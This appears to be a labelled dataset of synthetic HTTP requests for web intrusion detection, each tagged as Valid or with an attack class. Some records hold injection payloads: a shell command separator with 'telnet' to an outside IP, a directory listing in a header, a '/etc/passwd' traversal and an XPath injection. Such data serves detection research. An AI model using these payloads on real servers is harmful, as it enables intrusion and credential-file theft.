ETag: "R6VU5sbfP0eyLNEcx"
Expect: 100-continue
From: uoRceh@bnhno.gov
If-Modified-Since: Mon, 12 Jun 06 15:37:35 GMT
If-Unmodified-Since: Wed, 23 Apr 08 08:41:47 UTC
If-Match: *
If-None-Match: "ob7rAu.MyF_noGrAgEYN"
If-Range: "@4TQRKd_Sg-6_iU"
Max-Forwards: 13
MIME-Version: 4.2
Pragma: n23thi=t9l81v
Proxy-Authorization: NTLM c2k3QXN0dHNVa2FhM3hhZWlydGhjb3FOZWl1c2JjbmFp
Authorization: Basic bHRuaHVpYTpzaGZ4ag==
Range: 3-7,8-
Referer: /rqUik/ndElin.ace
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.4 (X11; U; SunOS sun4u 3.5; v0-en; rv:3.6.3) Gecko/00743505
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6505x533
Via: HTTP/9.5 10.130.1.87, HTTP/7.6 248.60.204.125:574
Transfer-Encoding: identity
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 725 253.1.47.103 "oke2ye3dngderrchr" 
X-Forwarded-For: 60.98.250.76
X-Serial-Number: 316874692201616
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

20n=?nHodpne9 e eitsnulliw &TtuDeljouiytl6=3er:e2insert&tIrnsae=nS.2xgAef&Xtgm3=5611313&emaebrsh=ntenos&isIs=tmail%  &pjsijnevasD7ouU=~t6cma&nonEvnlhiexHc=837&onYitirs=sdN&oAa9aoatbt3=0336510&2lee5d1IngicL=sShxceitmpt'r&geaoy=5bes1or7nrjaeA&bebttDolr=$4muael/0tmpt7&jrc=7

End - Id: 34264
Start - Id: 43622
class: OsCommanding
PUT /@73tj/ISzhOw9Iqm1dF7.jsp? HTTP/1.0
Content-Length: 176
Content-Language: On0h
Content-Encoding: deflate
Content-Location: http://www.r2aeo.com/idi6MQe/haam/8nnrbcL/l0o8ym0/acsrtci.doc
Content-MD5: dDYzcXd0M0R1b2FlY29udA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Nov 05 11:50:51 GMT
Host: www.ooosoem2ph.cz
Connection: oi5hkry
Accept: */*
Accept-Encoding: *;q=0.2
Accept-Language: ls     -las /home/    |
Cache-Control: no-cache
Client-ip: 24.160.147.123
Cookie2: $Version="208"
Date: Fri, 15 Jun 07 23:23:27 UTC
Expect: 100-continue
If-Modified-Since: Sun, 02 Aug 09 08:57:55 GMT
If-Unmodified-Since: Mon, 05 Feb 07 20:32:00 UTC
Max-Forwards: 376
Pragma: no-cache
Range: 887295-
Referer: /sdfge.gif
TE: deflate,trailers
User-Agent: Mozilla/1.0 (X11; U; Unix 1.2; au-te; rv:5.9.9) Gecko/19214592
Warning: 252 70.73.147.186 "pEmiltogwecsNt4" "Tue, 06 Jan 04 03:06:17 CET"

q7iumlrWl=l_s1h3M&spenhtostguooe=h oTriha Csa&ndTaolyo3=929336&mmk=264&pg03digye=:e9+6ajhescp5emhg&t3=dDqoAZ-nhC&oedk8lszohN6mc=53270&hoohexnin= xtye8at/Mie&ym.admin=0430

End - Id: 43622
Start - Id: 3286
class: Valid
GET /heoni/AoLaaeyHlE/xwsyewbj9eou2/tKxAGCup4cV/4u/iY1Y/a2/uvqxNOcg.KGjW/rzebd9taoaeme.gif?shzhit=ncn%24orvitoodnprocessing-instructionS-a&Ba8er=sPHUqlJIKC&Fhttpsp7UD=IwN8e+vEwp-yoi&eiw=5248&7f.F9r@dMSgr=havingroE4Ha%27lWar%2FCxinsertls&TQSq.TOLNxn9=eeuiTLrs&gme8tTen=hUdFzoyBP&ttroi=a7r6s&EZVwstyleB=3thmm8GD%27midNs&eUod7er2gerittn=97953&zYRfhtaccesUYsamVH=xy2TK4w1db%402&svtdymtkt=Lxmls1%25eeg7S%3Droar%3Am6i HTTP/1.1
Host: www.wmtots9t.st
Connection: close
Accept: video/*;q=0.5, audio/*
Accept-Charset: windows-1250, iso-8859-9;q=0.2, x-mac-arabic, windows-1254;q=0.2, x-mac-hebrew;q=0.0
Accept-Encoding: 
Accept-Language: uoheah-f
Cache-Control: eOih=cc
Client-ip: 107.185.188.2
Cookie: 8niNnroetrec=74574048;pldihjboecmAd1p=lchildyre;metakSJ0xh=ehrkaho;2sbaew=cSn8lrMIncTe0lw;qf=1Kf;6d6ksetiag=ree4smtuSegrOea
Cookie2: $Version="12"
Date: Wed, 31 Aug 05 15:38:57 GMT
ETag: "eDsrSWQ68q3m7OXcvWT"
Expect: 100-continue
From: ynnst@syowo.org
If-Modified-Since: Fri, 19 Feb 10 23:08:55 GMT
If-Unmodified-Since: Mon, 27 Sep 04 20:50:09 CET
If-Match: *
If-None-Match: *
If-Range: "evAi5896eEsuVgSPkIM"
Max-Forwards: 35
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: bhin tsL0=tTtsurat
Authorization: Digest response="BEE9BB5cEb9EE829ca67C550Cc1cF6a1"
Range: 0134-966096
Referer: /ohie/mYaoo9oe/smrsdes/n4fre7i3.gz
TE: deflate;q=0.2
Trailer: From
User-Agent: Mozilla/3.2 (Windows; U; Windows NT 9.5; no-el; rv:3.8.2) Gecko/70431155
UA-CPU: PowerPC
UA-Disp: 032,9401,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 179x3842
Via: HTTP/9.8 www.trtNmut.html, HTTP/4.2 203.191.220.95, HTTP/0.4 www.smLae5o.htm
Transfer-Encoding: gzip
Upgrade: bmdsep/9.4
Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 697185
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3286
Start - Id: 49362
class: XPathInjection
GET /dwrycieglo/eSeapdObnhSfibicUoEM/celo4neyl6nuDtI/etSshnjjHx/4nv.bin?ad=3++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++10247%3D HTTP/1.0
Host: 21.183.3.187
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesesimp, hz-gb-2312;q=0.0, windows-1252
Accept-Encoding: 
Accept-Language: ij-6ig;q=0.1
Cache-Control: max-stale
Client-ip: 30.6.154.223
Cookie: eAr=3;hbath9sgr5soe=hqt1@-tSuyCH
Cookie2: $Version="771"
Date: Mon, 01 May 06 20:49:54 UTC
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: deodan@edhI.net
If-Modified-Since: Wed, 12 Aug 09 02:28:53 CET
If-Unmodified-Since: Wed, 15 Jul 09 16:29:32 CET
If-Match: *
If-None-Match: "5.m4rxB5kaygeDde_"
If-Range: Sun, 08 May 05 08:07:48 UTC
Max-Forwards: 059
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: gEen je4f=me70Ymri
Range: 896-
Referer: http://snvc.de/0iiwhet/i9qnpna/ishg9n/ydxr/eiNIuh.jsp
TE: gzip;q=0.0
Trailer: Pragma
User-Agent: Mozilla/3.8 (compatible; 4aft; Linux i386; Tkwta9th; poitsa1t; nSs7ce7hao)
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 396x142
Via: 7.2 www.sarHtkd.tiff
Transfer-Encoding: compress
Upgrade: eens/3.9, nsloG/2.4, fad/4.2, efvt/2.8
Warning: 652 www.nylcr.tiff "iphresmanuhdbtxo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49362
Start - Id: 26137
class: Valid
GET /sndyleeuiSitqemnR/wsgEN/wstdWkardqznoi/includeaA6PopenVxket/aPpZZO344P5k5h7ECYA5/i2vPpLpedrzS-Efur/pQicq4IB5PeClkL/sbtnstywidnsi9einhp.jpeg? HTTP/1.1
Host: www.Ceoeg7so.st:80
Connection: keep-alive
Accept: application/zip;q=0.8, application/x-tar;q=0.4, image/*;q=0.1
Accept-Charset: iso-8859-7;q=0.7, iso-10646-ucs-2;q=0.6, x-mac-chinesetrad, x-mac-hebrew;q=0.3, shift_jis
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 239.116.234.200
Cookie: nl=N?hj;yyttiSi=erennuzieoetr9e;eht3vserLddtioo=inagosett
Cookie2: $Version="56"
Date: Sat, 09 Jun 07 18:59:13 UTC
ETag: "WGux.R1ASaPrVViN75"
Expect: mfttyo
From: xeno@faL1.st
If-Modified-Since: Sun, 28 Nov 04 05:57:05 CET
If-Unmodified-Since: Wed, 13 May 09 16:11:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Nov 09 21:56:37 UTC
Max-Forwards: 5
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM ZXN0MmVvbjBzdGlhbGwxbWNvQTUybmVsSWVlNWx0ZWllZWlWYWFsbnNicG8=
Authorization: Basic dHR3cjBUdDppaG84
Range: -076,520453-4710
Referer: http://www.sb6sb.de/q9iyso/gqPku/vTrzoea/aksT0mq.pl
TE: trailers,chunked,trailers
Trailer: Warning
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 1.1; io-jn; rv:5.4.3) Gecko/30147238
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1080x271
Via: 4.9 www.qpiawasO.htm:4644, 0.8 245.53.218.221
Transfer-Encoding: womtee
Upgrade: gefl/7.1, lhm/3.4, crto/0.1, lwu/3.1
Warning: 803 211.131.116.100 "tisise5eslK" "Tue, 29 Dec 09 16:59:21 UTC"
X-Forwarded-For: 212.197.71.231
X-Serial-Number: 44759103360851284549
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26137
Start - Id: 46125
class: PathTransversal
POST /n3wlFk/65nrgaet/-4k/9ama8alS2iloBmuy4/wJEFeJQYbAkBM9yEBay/eQm/TJzpincludeqB_sXW.jpg? HTTP/1.1
Content-Length: 155
Content-Language: rmA
Content-Encoding: identity
Content-Location: http://1rellyeo.de/nw9f.fgf
Content-MD5: aXNPcFRpaW9lbmZGYmU3cw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Dec 07 16:29:16 CET
Last-Modified: Thu, 04 Oct 07 03:14:09 GMT
Host: www.9ro0eld.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, x-mac-chinesesimp, x-mac-turkish;q=0.3
Accept-Encoding: *
Accept-Language: xt-om;q=0.5, tie-f;q=0.8
Cache-Control: no-cache
Cookie: wArdotlceoUe2=toiat>3aglhs;lfyorrinor=?f)yereo>eznu;FFGmrNBwG_ZU= a;XxHZMpLLap=406646;ujD.Z05=usrjoa
Cookie2: $Version="39"
Date: Sat, 31 Jul 04 06:24:24 GMT
If-Modified-Since: Wed, 11 Apr 07 17:48:29 GMT
If-Unmodified-Since: Sun, 21 Nov 04 07:33:47 UTC
If-Match: *
If-None-Match: "3qxEctoUD9PiVD3"
If-Range: Mon, 15 Jan 07 17:35:39 UTC
Max-Forwards: 068
Pragma: meeoe='eoRtao8'
Authorization: T0jfq aYoneuq=a4tysj
Range: 55330-08,72-9
Referer: http://rtleK.com/vhtee/msnHrm/dl3lhp.jpeg
Trailer: Host
User-Agent: 1dYekhtyE/2.0.6
UA-Color: color16
UA-Pixels: 106x0388
Via: HTTP/8.9 88.55.107.49, HTTP/7.6 237.47.27.168
Transfer-Encoding: identity
Upgrade: ocfh3/0.8, wds/5.3, eda/9.0, eSS/4.4, ikt/4.1
Warning: 398 www.erno.tiff:75 "uaihrtmhhjaneIbin" 
X-Serial-Number: 56816261659561
----: ----------------------------------------

oong=/etc/passwd&Erri=sKNgp-&qoe5capaca75wr=ocjNO&hlhane8qe=soa2x&rE=h (Ii4zye\ &est9libHhs=074655&QVYWreplacezMTx5il=2227716123&oistsErarsmnteo=td

End - Id: 46125
Start - Id: 5273
class: Valid
PUT /sS1hbRr.bEZtU4LA4E/r5i.rLlCEp8fdm-rT_Cm/atervisohsbnersn/a3nnwnt.php4? HTTP/1.1
Content-Length: 14
Content-Language: edi
Content-Encoding: compress
Content-Location: http://www.pdirqLf.st/e9u4e/gaeedt/fands5i.pl
Content-MD5: aXNoa3RDdTRlbHFydW9kdg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Nov 05 10:37:12 CET
Last-Modified: Sat, 16 Dec 06 20:18:56 CET
Host: www.ftaax.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: S-tk9Ce, irneEud-hiyny;q=0.1, ie4aa-Yx
Cache-Control: sa=eTwhju9y
Client-ip: 165.206.167.168
Cookie: eoroVIaciteaa=atonhEts Enph-u\a;9FCqhtacces=ttoope)4l ;ui=85844
Cookie2: $Version="07"
Date: Fri, 23 Mar 07 24:13:07 GMT
ETag: W/"Mej5kgQmiW7JuL0Ca"
Expect: 100-continue
From: anun@nmcev.org
If-Modified-Since: Tue, 20 Jan 04 17:50:54 UTC
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: *
If-None-Match: "WnurjKoIfvoj706X"
If-Range: Sat, 03 Jan 04 23:43:19 UTC
Max-Forwards: 649
MIME-Version: 9.4
Pragma: o9fo=g2C
Proxy-Authorization: sabs4 b0u0a=teeanu
Authorization: Basic TmV0YW86bGFhdHBzcG8=
Range: -400
Referer: http://kl95t.it/aeh2/ekrAe/schmnuit/68kqtipi/a47n.shtml
TE: chunked
Trailer: Trailer
User-Agent: tTsbV/4.3.4.6.2
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4414x768
Via: HTTP/1.5 www.mrihaa.css
Transfer-Encoding: euSa6e
Upgrade: 0e36rn/7.2, mnme/4.4, untq/8.6, nvm/5.4, vewas/6.8
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 76349451666157165
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

3r2VouSyiicn=W

End - Id: 5273
Start - Id: 26215
class: Valid
GET /X@fVbTN1ypO-sN/0r1ec54Exi7wnm/aaterqm/so3HFdgAui/e5MtzGjsn6M.png? HTTP/1.0
Host: www.Lqah.net:197
Connection: close
Accept: application/postscript, video/quicktime, video/*;q=0.3
Accept-Charset: iso-8859-7;q=0.6, iso-8859-8
Accept-Encoding: deflate;q=0.5, deflate, deflate, identity;q=0.3
Accept-Language: *
Cache-Control: min-fresh=81173
Client-ip: 237.86.185.182
Cookie: 3PJ.oWYblogobjecti7=efz;l7rain5bs=nlunxY;LaInnnEe=6214;ctoean7ezoeft=7132612;a0mdatibae1nB4=8AZ.xSipK@PC;tk=sa_HkuZ@
Cookie2: $Version="29"
Date: Wed, 21 Feb 07 03:59:48 CET
ETag: W/"rFsl@N.AdapEJzmyc4"
Expect: 100-continue
From: ts1wUaS@wxeiemthe.st
If-Modified-Since: Sat, 01 Jul 06 10:52:22 GMT
If-Unmodified-Since: Fri, 15 Apr 05 09:14:08 CET
If-Match: "u0VGMfFep54JiDg2Av"
If-None-Match: *
If-Range: Sun, 23 Aug 09 09:07:37 GMT
Max-Forwards: 51
MIME-Version: 6.7
Pragma: m='ynrnaoeh'
Proxy-Authorization: NTLM Z2NlSWx1YW1zaGQweGllY2UzYmNxeWlXc3hubTZucml0WnRUeWltZQ==
Authorization: Digest nonce
Range: 485874-76550,627253-,688763-0608
Referer: http://www.ltsurn.com/suriatp/Nahtea/obtnc/w7bs2/3tane.asmx
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 8.3; is-ea; rv:3.0.4) Gecko/69104522
UA-CPU: PowerPC
UA-Disp: 040,6518,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x086
Via: 5.3 www.Oaaot.gif
Transfer-Encoding: deflate
Upgrade: u9iTI/6.5, 3wch/6.2, lNtre/1.1, oAhiht/7.8, 2iee/2.5
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 2106773576
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26215
Start - Id: 16914
class: Valid
GET /obFXu6rqF/0O5/y0ApkBKKPe4exUr.js?mf2kj_Qq=o%25uEou5noeewp-bolar&sEtaawearm4v=%5Ciqm&a6n1MlPa0tp=esdtiupmS6a9&xrunYk=1&ZYj._h=02895747&SWWxMAic=28&lic0nxwhainl=bin+unionu HTTP/1.0
Host: www.rjciedfhrb.org
Connection: close
Accept: audio/x-wav, text/*, audio/x-wav
Accept-Charset: big5, koi8-r
Accept-Encoding: 
Accept-Language: tirhnrfr-eowa;q=0.7, y-Aleyr5ao, srf-6gd
Cache-Control: no-transform
Client-ip: 98.97.115.240
Cookie: tatnsNl1=cs;qtfALirB4elpo=aIKJBki4CYWN;Ditnopionis=5789782
Cookie2: $Version="79"
Date: Tue, 10 May 05 11:04:15 UTC
ETag: W/"12Ne@V_DU0DcIxV"
Expect: 100-continue
From: lieouw@nat4Ue.st
If-Modified-Since: Thu, 06 Apr 06 15:08:48 UTC
If-Unmodified-Since: Sun, 13 Jul 08 12:50:31 CET
If-Match: "250FYWBG_ZiZDceq"
If-None-Match: "83tAWRELmye7Uq5Zb5"
If-Range: "7pv_Hs.VhOJp9lEGUn"
Max-Forwards: 8684
MIME-Version: 7.6
Pragma: kesAaflr=tFrmeDne
Proxy-Authorization: tmhq ooi4=OrpoX
Authorization: NTLM MnRlemlhUGVlR3pyQnRQME8xdGpydDZyZzhhYmVsU3J1MWVpaXVl
Range: -3
Referer: /8o1fueta.tiff
TE: trailers,trailers
Trailer: Accept
User-Agent: cteif (tmM4m3KrLb; iivf7Axw; k3lgqAre; rN@dPwKEn; sKyBQBef)
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 292x6729
Via: uad/2.7 140.236.54.111, 3.9 48.167.250.93, 2.8 www.x3lShKrr.shtml
Transfer-Encoding: gzip
Upgrade: dHed/7.3, olnnat/3.7, o5p/0.1, wnMa/3.1, arrnc/1.6
Warning: 857 163.225.188.126 "yherr" "Tue, 27 Jan 09 20:54:03 UTC"
X-Forwarded-For: 164.142.194.146
X-Serial-Number: 49349501670921026
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16914
Start - Id: 27875
class: Valid
GET /DQxp_DrsKX/cconnectX06xr/54VVVD2GOLvGKiW/iSPbY3vh5iV01.r/z@tHa4QUWfEajXa2Cup/qaiwhe5t9yreetalaeo/2IohtotN/odthaBoa/xy.aspx?Vveeint=ncao%405oi&HSPpassthruEsK=hes%3CteFp+bi HTTP/1.1
Host: 86.185.45.39
Connection: eoodunfi
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.2, gzip;q=0.5, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 202.94.102.161
Cookie: scOnleynty3=hiaRgsulogincludenetcate&drlsreplace;7lhBn=pae7xs87rsncssDet
Cookie2: $Version="71"
Date: Mon, 12 Apr 04 20:20:29 UTC
ETag: "3bi8TVg5_pidMUIy"
Expect: ejdey=oobsrshy;ee21tw7e=gdoE
From: uymea4@oslItttg1b.biz
If-Modified-Since: Tue, 14 Jun 05 22:01:52 UTC
If-Unmodified-Since: Fri, 14 Nov 08 16:56:48 GMT
If-Match: *
If-None-Match: "iiI74t_Ngg44-@iPZ6"
If-Range: Mon, 26 Sep 05 02:15:15 GMT
Max-Forwards: 643
MIME-Version: 5.7
Pragma: oieeYeqa=uOO5r
Proxy-Authorization: nd1t nsieUE6e=uDueyte
Authorization: NTLM NnJ1bXRycm1mczBuZThubmVudEh0bnJuZnJzb3RhMGlvcmxkaG9o
Range: 334528-3,129-5609,255074-1318
Referer: /Utedar.nsf
TE: trailers,chunked,deflate;q=0.4
Trailer: If-None-Match
User-Agent: t2mpe1tU
UA-CPU: x86
UA-Disp: 0211,623,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8765x0161
Via: 4.4 www.oagT.gif
Transfer-Encoding: 1Tde9; di3n=oscrae
Upgrade: inaoy2/3.1, sIxw/5.6, teehaD/4.3, ozitdh/8.9, E1veo/9.5
Warning: 179 www.snrm.css "8ebbnsessuhaeisimedl" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 8614528725280
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 27875
Start - Id: 31298
class: Valid
GET /oCG-GJxnpMWA-ZH5/nK4YF6bl/idmnmaOgnuciEoyt/passwdcmRSlygi/4eeb/duhrhdYPderso9/nnh91.asmx?Spksarfesvetyon=yVMdjZE%40ye&sih3MioqtsgaeT=oss2ohasVlNoe&redseianni=tni&S1gdelete=248&IQsehenIcv=7804207839&FWgsy=8&xeoqpsihtea12=0ylh1rh5hac3e2&mdIitUcd5aoip=eatrEaorkbp&vaedtcrthi=yr+dhmtmp&vJR6ONZ=5074332&Hk.yJOW=atwnfnnef2hre&me5cyisteaf=+Ei1ncscdi&tdeeedhea=153 HTTP/1.1
Host: www.7Eeonhxomt.gov
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-3, ks_c_5601-1987, euc-tw;q=0.9, iso-8859-5;q=0.4
Accept-Encoding: 
Accept-Language: itsimt-nqcxrTtn, e-zoMhlic;q=0.0, u1emsn-9limxei;q=0.4, sitItE-le3l
Cache-Control: max-stale=27036
Client-ip: 30.86.131.32
Cookie: eeexiurfs9a7t=s6dnodeeaa;retnepeuzT=ieki;uldeve3ihta7q9=tidef84;iaee0=l=8kcdHunlis
Cookie2: $Version="86"
Date: Wed, 29 Apr 09 09:51:07 CET
ETag: W/"hymKgXG4n-DMde@"
Expect: 8ref
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Thu, 15 Jan 04 06:55:17 GMT
If-Unmodified-Since: Fri, 04 Apr 08 18:25:38 UTC
If-Match: "kLI51OXp_ruUiB_3"
If-None-Match: "Wnt1ngqgXAz3tIZ28yI"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.7
Pragma: txeaw=8alrtou
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Digest realm
Range: -388719
Referer: /accnw/nefoj9er/anhs.wmn
TE: trailers
Trailer: If-Range
User-Agent: izd3ZTO2 http://www.m7em7Ss.biz
UA-CPU: 68000
UA-Disp: 913,006,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3795x126
Via: 5.0 www.mnxuaCh.css, 3.3 82.152.211.244:9671, ain/9.4 www.taob.png
Transfer-Encoding: gzip
Upgrade: GorsU/6.8
Warning: 321 www.eor2Lmo.js "uenlgbdrgd" "Thu, 25 Sep 08 14:31:46 CET"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 19975103702041992
----: -----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31298
Start - Id: 32435
class: Valid
GET /connectPKaccess_logRhall/iCorhvlakt2asfey/tDoEaTLdOqqI.8x/idr0hnwddht/oevaluOo7bf@/eUgwiaraioetg/nOR0gJeFx0SSawmmar.js?cfi=oeam+&ep4jaihabR=miztspddG&fabjKO-Fhaving4=telirswtdobxS+&yhot=amYencis&8poSSBls=09501&e5auFde=%5Bra+l&rtfemore=g%3C HTTP/1.0
Host: www.elgnaefeb.fr
Connection: close
Accept: audio/*, text/xml;q=0.4
Accept-Charset: x-mac-hebrew;q=0.3, iso-8859-4, cp-932;q=0.7
Accept-Encoding: deflate, identity, deflate;q=0.6
Accept-Language: *
Cache-Control: min-fresh=2449
Client-ip: 61.133.94.100
Cookie: mDN1UI=dBE@q1.;anod9=4726;bTjJEe=pscripto;boE=etdneUaor
Cookie2: $Version="744"
Date: Sat, 08 Aug 09 11:07:21 UTC
ETag: "tqC@JMKR_PyTjEEXyEls"
Expect: iuxhGc=9rS7mt
From: releg@syoCrleekk.net
If-Modified-Since: Fri, 16 Dec 05 14:36:45 CET
If-Unmodified-Since: Sun, 20 Mar 05 21:29:09 CET
If-Match: "NaRZR63zf6-QxzGovVw"
If-None-Match: "FFvCe33FFpc7UvQ2"
If-Range: *
Max-Forwards: 741
MIME-Version: 9.5
Pragma: d5azjaws='migt'
Proxy-Authorization: et6l beaes2md=oil8eA1
Authorization: eTea tmrfRi=u1ttn
Range: -559,9543-
Referer: /l4vnr.php
TE: chunked;q=0.5,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: dedlnrnnnbi7IirS
UA-CPU: PowerPC
UA-Disp: 339,988,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5662x6161
Via: HTTP/1.6 195.96.5.7
Transfer-Encoding: compress
Upgrade: 1o0/3.7, s7dacb/4.7
Warning: 635 www.g4Aean.shtml:356 "6nfv" "Tue, 13 Mar 07 11:19:31 UTC"
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 824098
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32435
Start - Id: 43496
class: OsCommanding
GET /omsa4/9iAT9DMH/iQ6ppFe@/_we7MSV/e51kQ452/imn8tt/n1ljLgE9D2hRj@nwD/iun.js?XimAXSs=5E15&npnmel2groa=357833&tatr=%22+++++%3B+++++telnet+++88.84.217.21+++++80++++%3B HTTP/1.1
Host: www.rhu1ir1je.uk
Connection: nemcrl
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.2, gzip
Accept-Language: do-kU, onl-tnhuien, an-0udm27E;q=0.6
Cache-Control: no-cache
Client-ip: 43.152.7.162
Cookie: tlm=hs0aCroephpunbaservices;licbo=execos+<ss;0actacceptld;edsDwnl=46;ttpsr5Im=2laitn9e;ohlktcuoaqbeac=wonefH88privoBw;moesoecihzch=opcspq0eitczoi402
Cookie2: $Version="514"
Date: Thu, 15 Nov 07 15:57:28 CET
ETag: W/"uhZCKDWcmyXWFNL"
Expect: reNwssAo=Iiubo;seruenh=eiwamf
From: fxtr5UaD@nYeuiAuhet.net
If-Modified-Since: Sat, 13 Mar 10 21:32:11 GMT
If-Unmodified-Since: Fri, 12 Jun 09 08:20:36 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Apr 10 12:31:57 CET
Max-Forwards: 1
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: Basic NTJldzpibHZ5aGw0
Range: 32-61,4386-85
Referer: /0Iacle39/ttobN/m10lig.txt
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.0 (Machintosh; U; Mac OS X 9.4; xl-us; rv:2.8.3) Gecko/19423702
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: 5.8 33.148.210.176
Transfer-Encoding: compress
Upgrade: trzhel/9.1, tsfae/2.2
Warning: 030 157.207.32.92 "imad6oletnEdRcinytly" "Thu, 14 Apr 05 13:21:07 CET"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 521013041943
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43496
Start - Id: 19146
class: Valid
GET /sqv3Zt7z8jDxbPe.ALT/hAnm9uZYMfOvrjF7V8/wAiqt37a/taCohzw/dKvqGM@DVFpxmwqq/bmgdcherb.png?jbof=oahwe3%3B+d&iNh=9-w9t&edi7tdo=eegr2hssexdon6m&aiui09sit=faoyahDSsWelybMa&otcsowsoie=uy._Li HTTP/1.1
Host: www.rspo8oep.st
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.1, utf-8, x-mac-turkish, iso-2022-kr;q=0.0
Accept-Encoding: identity, deflate, gzip;q=0.2, gzip;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 40.88.186.196
Cookie: cbooepararnka8=em;KvPt=rlvcs;ouyov=iV.rkCrqy;t9JiJ=bdyh) fue;9oesteOlesi=ieh;lnta1ttoe=rJi
Cookie2: $Version="746"
Date: Sun, 03 Feb 08 17:47:29 UTC
ETag: W/"eKP35ifDThMvjLc-p"
Expect: strmdrs=wmanetts;rxms=ckveNs
From: wi5la4tl@ue6nMine5.biz
If-Modified-Since: Thu, 22 May 08 23:27:29 GMT
If-Unmodified-Since: Fri, 13 Aug 04 03:32:21 CET
If-Match: *
If-None-Match: "E@57J6ZbjFf.5xgIk2Z"
If-Range: "MKSQEd0Ac.1gCKr1pS"
Max-Forwards: 58
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM N25qRXB5YW5BNk92Nk55aWVlbm1Dc2hzYW5heXNTd3JtaW55
Authorization: Digest cnonce="Tkeesaeb"
Range: 2893-27
Referer: /e5Daassa.pl
TE: gzip
Trailer: Accept-Encoding
User-Agent: h_t9iu6 http://www.IercwRf.cz
UA-CPU: x86
UA-Disp: 070,359,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8378x546
Via: FTP/3.0 193.52.213.97:4703
